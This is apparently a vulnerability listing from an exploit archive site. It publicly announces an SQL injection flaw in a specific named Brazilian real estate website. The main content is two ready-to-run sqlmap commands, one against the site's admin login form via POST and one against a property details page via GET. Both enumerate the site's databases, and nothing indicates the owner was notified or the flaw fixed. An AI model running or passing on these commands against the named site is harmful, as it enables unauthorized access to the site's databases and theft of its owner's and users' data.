Japan Imóveis | SQL Injection

2021.04.12
br uRomulou (BR) br
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Peace guys, @uromulou in the game! Hacker: uRomulou My friend: GaskmanTR Website: https://japanimoveis.com.br/ Vulnerability: SQL Injection Method: POST and GET Example using Method POST: sqlmap --random-agent --data="login_=&senha_=&logar=Logar" --url https://japanimoveis.com.br/adm/login.php --dbs Example using Method GET: sqlmap --random-agent --batch --url https://japanimoveis.com.br/detalhes_imovel.php\?Cod=533 --dbs


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top